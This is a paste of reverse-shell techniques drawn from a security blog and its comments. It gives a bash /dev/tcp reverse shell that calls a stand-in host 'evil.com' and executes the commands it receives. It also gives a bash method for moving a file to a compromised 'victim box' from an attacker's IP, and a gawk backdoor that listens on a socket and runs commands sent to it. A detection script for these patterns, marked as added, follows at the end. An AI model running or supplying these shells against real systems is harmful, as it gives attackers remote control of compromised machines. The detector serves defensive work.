============================================
www.techgaun.com
Reverse shell examples from http://www.gnucitizen.org/blog/reverse-shell-with-bash/ including those from comments
www.techgaun.com
============================================

Although netcat is very useful, and you may have to use it in most cases, here is a simple technique which emulates what netcat does but relies on bash only. Let’s see how.

In step one we start a listening service on our box. We can use netcat, or whatever you might have at hand.

$ nc -l -p 8080 -vvv

On the target we have to perform some bash-fu. We will create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor.

$ exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done

-------------

Transfer a file using HTTP: Say you have compromised a victim box and want to transfer a file to the victim.

1. Put the file in the web root of the attacker box (I’m thinking of the web server in BackTrack).
2. Start up the web server on the attacker box
3. On the victim box do:

(echo -e "GET /filename_you_are_moving HTTP/0.9\r\n\r\n" \
1>&3 & cat 0<&3) 3<> /dev/tcp/AttackerIP/80 \
| (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; \
do read i; done; cat) > local_filename

Credit where credit is due:
http://www.pebble.org.uk/linux/bashbrowser

-------------
Reverse shell in gawk

#!/usr/bin/gawk -f

BEGIN {
    Port = 8080
    Prompt = "bkd> "

    # gawk special file /inet/tcp/LPORT/RHOST/RPORT; 0/0 for the remote side makes this a listener on Port
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                # run the received line as a command and send its output back over the socket
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}

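Detection side of the snippets above, as an added example that is not part of the original paste or the blog it quotes: a POSIX shell function that scans logged command lines or script text for bash /dev/tcp and /dev/udp redirections and for gawk /inet socket paths. The function names and the sample lines are constructed for illustration; the matching is a baseline heuristic and assumes the path appears literally in the text.

```sh
#!/bin/sh
# Added example (not from the paste): flag bash /dev/tcp|udp redirections and
# gawk /inet sockets in logged command lines or script text.

# Reads text on stdin; prints "LINE<TAB>KIND<TAB>MATCH" per indicator found.
find_net_redirections() {
    awk '
    {
        rest = $0
        # bash opens a socket only when the pseudo-path is a redirection target,
        # so require <, > or <> (optionally a space or a quote) right before it.
        while (match(rest, "[<>][ \t]*\"?/dev/(tcp|udp)/[^/ \t;|&)\"]+/[^ \t;|&)\"]+")) {
            hit = substr(rest, RSTART, RLENGTH)
            sub("^[<>][ \t]*\"?", "", hit)
            printf "%d\tbash-redirect\t%s\n", NR, hit
            rest = substr(rest, RSTART + RLENGTH)
        }
        # gawk scripts often build the path by concatenation, so match the prefix.
        if (match($0, "/inet[46]?/(tcp|udp)/"))
            printf "%d\tgawk-socket\t%s\n", NR, substr($0, RSTART, RLENGTH)
    }'
}

# Constructed sample input: two benign lines and three lines modelled on this page.
sample_log() {
    cat <<'EOF'
ls -l /dev/tcp
exec 5<>/dev/tcp/evil.com/8080
(echo -e "GET /f HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<> /dev/tcp/AttackerIP/80 | cat > out
Service = "/inet/tcp/" Port "/0/0"
curl -s http://example.com/dev/tcp/readme
EOF
}

sample_log | find_net_redirections
```

Feed it shell history, process-audit command lines, or the contents of scripts found on a host; lines that only mention the path without a redirection operator are not reported.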